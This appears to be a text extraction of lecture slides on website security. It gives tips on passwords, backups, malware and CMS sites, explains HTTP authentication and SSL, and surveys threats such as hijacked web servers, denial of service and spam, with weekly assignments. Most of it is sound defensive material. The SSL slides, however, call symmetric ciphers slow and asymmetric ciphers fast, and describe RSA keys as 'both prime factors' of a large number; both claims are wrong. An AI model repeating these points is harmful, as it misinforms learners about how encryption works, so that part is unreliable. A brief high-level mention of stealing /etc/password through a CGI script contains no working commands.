Embed Size (px)
Citation preview
Session
Website Security
Session Outline
Passwords Data Back-up Anti-virus Software Malware CMS Software
This Session Weekly Activity: Web Security Threats Consider this: Hackers can target for personal information:
Internet connections – both front-end and back-end, ISP’s (Internet Service Providers), and Host databases
Research recent news stories on instances of this occurring.
Suggest some recommendations on strategies to prevent these intrusions from reoccurring.
Word Count: 200 - 300
10 Internet Security Tips
Never enter personal information in an e-mail message when you don’t know the recipient.
Never enter personal information on a website provided as a link in an e-mail message.
Never include personal information in an Internet forum, a discussion group, or newsgroup message.
Never use the same password for all your electronic business.
Never divulge personal information to others using an instant message connection.
10 Internet Security Tips
Never use your mobile device on the road without turning on the firewall.
Never buy from an online store that doesn’t offer a secure, encrypted connection when you’re prompted for your personal information and credit card number.
Never download a file from a site you don’t trust. Never allow a stranger to connect to your
computer using the Screen Sharing feature. Never allow young children to use the Internet
without guidance and supervision.
Computer Security Keeping your computer free of viruses and other
malware is a crucial part of running a business. Not all use of the internet is safe. Your organisation’s
computers may become infected with viruses and other malware if you are the victim of an online scam, if you download illegitimate software or if you visit a malicious and untrustworthy website.
If your organisation’s computers are infected with malware, it can be a blow to your productivity. You may lose revenue if you cannot operate while computers are taken out of action, or you could lose whole projects and have to start them again.
Computer Security The consequences of picking up malware can
extend beyond just you and your organisation—it could become an issue of protecting your customers.
Some types of malware can steal data from you, including personal information about your customers, donors or supporters.
Malicious Software The internet is part of everyday life, at home,
work and school. It's important to be safe when online and to secure your computers and servers properly, otherwise you may be putting your home finances or business at risk.
If malicious software infects your computer equipment it can corrupt your files and can allow others to access your confidential business information.
Malicious Software You can help reduce the risks by having up-to-
date security software installed and activated, securing your internet connections and services and understanding and managing the emails and files you receive or download.
Backing-up your data can also help you recover your information if a virus destroys your files, or if your computer is stolen or damaged.
Malicious Software Protection Protect against malicious software (malware) Viruses, spyware, trojans and worms are all types
of malware. Malware is software designed to be installed into a computer system to cause harm to the user or others.
Malware can track your movements in the real world and steal information (including passwords) for the purposes of identity theft or crime.
Watch out for prompts or warnings asking if you want to allow software to install or run. If you don't know what it is, don't accept the prompt.
Things To Consider! Set and use strong passwords Remembering passwords Protect your email Manage and reduce spam Malware Prevent spyware from getting onto your computer Is your computer infected? Use online telephoning (VoIP) VoIP threats Minimising security threats
Things To Consider! Back-up your data Comparison of back-up options Frequency and types of back-ups The benefit of multiple back-ups Disaster recovery and back-ups Develop a back-up strategy Share files Sending and receiving files via email Sending and receiving files via portable storage
devices Peer-to-peer file-sharing networks
Things To Consider! Update software Updates for Windows Updates for Apple Updating anti-virus and plugins Updating security software Anti-virus features Secure your internet connection Secure your wireless network Protect your web browser Cookies and security Access security settings on your browser
Things To Consider! Secure your computers Secure your servers Secure your equipment Firewalls Remotely accessing your network Secure your network Secure your remote access
Website Hacking Protection
Your organisation’s website faces a range of security risks from other people, generally ‘hackers’ (more specifically, ‘black hat hackers’).
Black hat hackers may try to directly access your computer and steal or modify your files while it is connected to the internet. They may also try to leave malware in your website to infect visitors and eavesdrop on your communications (for example, through the use of keystroke logging).
Securing Your Website It is important that businesses try to make sure
that their websites are not used to pass on threats to their visitors. This can occur when a hacker alters the coding of the website to include malicious code, known as ‘drive by downloading’.
There are commercial services available that will scan a website on a regular basis to check for malware and vulnerabilities. There are also a number of companies that provide a service that will scan your system for malware prior to issuing a trust seal to reassure your users.
Internet Security Software
Most IT security software now includes services for rating websites you are visiting. These services should advise you if the website has known vulnerabilities, or has been reported for illegal activities.
Some internet services providers (ISPs) have more advanced security features than others. Get in touch with your ISP if you would like to find out what measures they are taking to protect your organisation’s computers from online threats.
Backing Up Data This may help insure against viruses,
hackers, hardware failures or damage to hosting servers.
It is common practice to insure an organisation against things like fire, theft and natural disasters.
In a similar way, backing up your organisation’s data and your website may help you recover what you’ve lost in the event of viruses, hackers, hardware failures or damage to hosting servers.
Backup Systems A good backup system typically includes:
daily incremental backups to a portable hard drive, CD, DVD or cloud storage service
end-of-week server backups—in-house and offsite quarterly server backups—offsite yearly server backups—offsite.
Backing up your organisation’s data Most organisations move large amounts of
important digital information on their computers, laptops, mobile phones, tablets and servers. This is called ‘locally-stored data’.
Backup Systems No matter how big or small your organisation
is, you may be at risk of losing this data if you don’t back it up on a regular basis. Fortunately, backing up your locally-stored data is generally cost-effective and easy.
One way of backing up important files is to copy them to a different medium—CD, USB hard drive, a local server or a cloud storage service. Each medium has certain advantages.
Backup Automation Backing up your files can be automated. In
other words, you can get special software that automatically copies your files to your chosen medium on a regular basis.
Some free options include: Apple Time Machine. Crash Plan. Windows 7 Backup and Restore.
Backup Automation ??? Which back up method is best for my
business? Which back up method you choose for your
business generally depends on: the amount of data you need to back up? how secure you need the data to be?
Website Backup With content management system (CMS), the CMS
software provider should provide instructions for backing up your data on their own websites.
If you are creating your website with the help of a web developer or website creation company, it may be worth talking to them about how to create your own backup system.
It may also be worth finding out if your web hosting service provides a backup service. This may cost money, but it could be a worthwhile investment if the loss of data would be a particularly large blow to your organisation.
HTTP Authentication Protect web content from those who don’t have a “need to
know” Require users to authenticate using a userid/password before
they are allowed access to certain URLs HTTP/1.1 requires that when a user makes a request for a
protected resource the server responds with a authentication request header
WWW-Authenticate contains enough pertinent information to carry out a “challenge-
response” session between the user and the server
Web Server
Client
Client requests a protected resource
Server responds with a 401 (not authorized and a challenge requestfor the client to authenticate
Client Response Well established clients like Firefox, Internet Explorer ….
will respond to the challenge request (WWW-Authenticate) by presenting the user with a small pop-up window with data entry fields for
userid password a Submit button and a Cancel button
entering a valid userid and password will post the data to the server, the server will attempt authentication and if authenticated will serve the originally requested resource.
Website Authentication Secure Sockets Layer (SSL)
Invented by Netscape and made public domain for everyone’s use
An additional layer to the TCP/IP stack that sits between the Application and Transport layers
ensures that all application data is encrypted but TCP/IP headers are not
usually run on port 443 (default HTTPS port) Public Key Cryptography
owner of a private key sends a public key to all who want to communicate with him (keys are both prime factors of a large (1024 bit) number). Owner keeps the private key secret and uses it to decrypt information sent to him that has been encrypted with the public-key
RSA algorithm is most notable public-key cipher algorithm
Website Authentication Digital Certificates
issued by a disinterested third party (ex. Verisign) the Certificate contains the public-key for the specific Web
Server and a digital signature of the certifying authority
SSL Encryption Once a secure session is established the source requests the
destinations certificate ( sent in the http header (uncncrypted))
once the source accepts the authenticity of the certificate it uses the public-key from the certificate to encrypt the generated session key for protecting the conversation between the source and destination.
Session is encrypted using a symmetric cipher (slow) conversation is encrypted using an asymmetric cipher (fast) its done this way to speed up overall communications, strong
encryption (slow) is used as little as possible while weaker encryption is used for most exchanges
actual cipher algorithms are negotiated on a per-session basis
Internet Security Today
What are the main security-related problems on the Internet Today?
Hijacked web servers Denial-of-Service Attacks Unsolicited Commercial E-Mail Operator Error, Natural Disasters Microsoft...
Internet Security Today
What are not the major security-related problems? Eavesdropped electronic mail.
(Misdirected email is a problem.) (Email swiped from backup tapes is a problem.)
Sniffed credit card numbers. (Credit card numbers stolen from databases is a
problem.) Hostile Java & ActiveX applets.
Hijacked Web Servers Attacker gains access and changes contents of
web server. Usually stunts. Can be very bad:
Attacker can plant hostile applets (an applet is any small application that performs one specific task ).
Attacker can plant data sniffers (i.e. capture data being transmitted on a network.)
Attacker can use compromised machine to take over internal system.
Hijacked Web Servers
Usually outsiders. (Could be insiders masquerading as outsiders.) Nearly impossible to trace.
How do they do it? Administrative passwords captured by a password
sniffer. Utilize known vulnerability:
sendmail bug. Buffer overflow.
Use web server CGI script to steal /etc/password file, then crack passwords (Common Gateway Interface (CGI) is a standard environment for web servers to interface with executable programs installed on the server that generate web pages).
Mount the web server’s filesystem.
How do you defend against it?
Patch known bugs. Don’t run unnecessary services on the web
server. Don’t run sendmail
Use sniffer detection software if possible.
How do you defend against it?
Practice good host security. Don’t run open operating systems. Use operating system monitoring tools...
Monitor system for unauthorized changes. Tripwire
Monitor system for signs of penetration Intrusion detection systems
How do you defend against it?
Make frequent backups. Have a hot spare ready. Monitor your system frequently.
Denial-of-Service a denial-of-service (DoS) attack is an
attempt to make a machine or network resource unavailable to its intended users
Publicity is almost as good as changing somebody’s web server.
Attack on web server Attack on Cyber Promotions
Costs real money Lost Sales Damage to reputation
Kinds of Denial-of-Service Attacks
Direct attack: attack the machine itself. Indirect attack: attack something that points to
the machine. Reputation attack: attack has nothing to do
with the machine, but references it in some way.
Direct Denial-Of-Service Attack
Send a lot of requests (i.e. Email requests) (HTTP, finger, SMTP)
Easy to trace. Relatively easy to defend against with TCP/IP
blocking at router.
Unsolicited Commercial E-Mail
Pits freedom-of-speech against right of privacy.
Consumes vast amounts of management time. Drain on system resources.
Who are the bulk-mailers? Advertising for Internet neophytes. Advertising for sexually-oriented services. Advertising get-rich-quick schemes. Advertising bulk-mail service.
How do they send out messages?
Send directly from their site. Send through an innocent third party. Send with a computer virus or ActiveX applet
How did they get my e-mail addresses?
Usenet & Mailing list archives. Collected from online address book.
AOL registry. University directory.
Guessed Sequential CompuServe addresses.
Break into machine & steal usernames.
Operator Error & Natural Disasters
Still a major source of data loss. Hard to get management to take seriously.
Not a priority (i.e. invisible). Preparation is expensive. If nothing happens, money seems misspent.
Operator Error
Accidentally delete a file. Accidentally install a bad service. Accidentally break a CGI script. Psychotic break.
Natural Disaster Fire Flood Earthquake
Solutions Frequent Backups
Backup to high-speed tape. Real-time backup to spare machines. Make sure some backups are off-site.
Recovery plans. Recovery center. Test your backups & plans!
Microsoft
Danger of homogeneous environment. No demonstrated commitment to computer
security. Windows operating systems often not secure. Word Macro Viruses. ActiveX SMB
Windows systems releases premature.
Next Session Weekly Activity: Good Website Design Consider this: Effective web design is judged by the users of the website
and not the website owners. There are many factors that affect the usability of a website, and it is not just about form (how good it looks), but also function (how easy is it to use).
Websites that are not well designed tend to perform poorly and have sub-optimal Google Analytics metrics (e.g. high bounce rates, low time on site, low pages per visit and low conversions).
So what makes good web design? Identify and briefly discuss those web design principles that
will make your website aesthetically pleasing, easy to use, engaging, and effective.
Word Count: 200 - 300
